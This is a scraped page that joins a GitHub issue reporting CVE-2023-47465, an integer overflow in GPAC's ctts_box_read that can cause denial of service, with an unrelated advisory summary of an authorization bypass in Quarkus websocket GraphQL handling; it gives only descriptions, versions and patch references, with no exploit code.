isomedia/box\_code\_base.c:413:29: runtime error: negation of -2147483648 cannot be represented in type 'int'; cast to an unsigned type to negate this value to itself

Copy link

Contributor Author

\[AFFECTED AND/OR FIXED VERSION(S)\]  
AFFECTED VERSION: gpac - version <= 2.2.1  
FIXED VERSION: current master branch  
(patch: a40a3b7 and 613dbc5)

\[PROBLEM TYPE\] – must contain at least one: Vulnerability Type, Root Cause, or Impact:  
Vulnerability Type: Integer Overflow  
Impact: Denial of Service

\[DESCRIPTION\]  
An issue in GPAC v.2.2.1 and before allows a local attacker to cause a denial of service via the ctts\_box\_read function of file src/isomedia/box\_code\_base.c.

This issue was assigned CVE-2023-47465

1 participant

CVE-2023-47465: Integer overflow issue in isomedia/box_code_base.c:413 · Issue #2652 · gpac/gpac

A flaw was found in Quarkus. This issue occurs when receiving a request over websocket with no role-based permission specified on the GraphQL operation, Quarkus processes the request without authentication despite the endpoint being secured. This can allow an attacker to access information and functionality outside of normal granted API permissions.

**Authorization bypass in Quarkus**

High severity GitHub Reviewed Published Dec 9, 2023 to the GitHub Advisory Database • Updated Dec 12, 2023

Tag

#git